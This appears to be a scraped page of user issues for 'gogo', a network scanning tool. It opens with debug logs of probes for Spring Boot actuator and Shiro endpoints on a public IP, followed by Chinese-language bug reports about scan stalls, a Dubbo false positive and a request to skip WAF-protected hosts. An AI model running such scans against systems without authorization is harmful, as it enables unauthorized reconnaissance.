[debug] payloads: path:info
[debug] request GET http://39.98.123.211:8170/actuator/info map[path:info]
[debug] payloads: path:env
[debug] request GET http://39.98.123.211:8170/info map[path:env]
[debug] payloads: path:env
[debug] request GET http://39.98.123.211:8170/actuator/info map[path:env]
[debug] neutron scan http://39.98.123.211:8170 with springboot-actuator error:
[debug] neutron scan http://39.98.123.211:8170 with shiro-detect
[debug] request GET http://39.98.123.211:8170 map[]
[debug] neutron scan http://39.98.123.211:8170 with shiro-detect error:
[+] http://39.98.123.211:8170 focus:springboot:(finger ico) [404] HTTP/1.1 404
[] Alived: 1, Total: 1 , 2024-04-24 16:43.59
[*] Time consuming: 3.5599506s , 2024-04-24 16:43.59

生成 sock.lock 文件疑问

在内网做B段扫描,扫一段时间自动产生 sock.lock 文件,然后就停止了,看了源码没看太懂,方便解答一下吗,谢谢。

dubbo_unauthorized 有误报

漏扫信息:
tcp://xx.xx.xx.xx.xx:20880 focus:dubbo-remote [tcp] Unsupported c [ high: dubbo_unauthorized ]

验证信息:
Trying xx.xx.xx.xx.xx...
Connected to xx.xx.xx.xx.xx.
Escape character is '^]'.
ls
Command: ls disabled for security reasons, please enable support by listing the commands through 'telnet'

跳过waf

师傅可以添加新功能吗,遇到有waf的ip不扫描端口。

-F处理大文件结果有点吃力

7.0M scan.txt_all_default_json.dat1

gogo -F scan.txt_all_default_json.dat1 -o c 处理起来挺久的
另外能不能 -F 处理导出 ip:port 这种类型 或者导出excel表格之类的

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.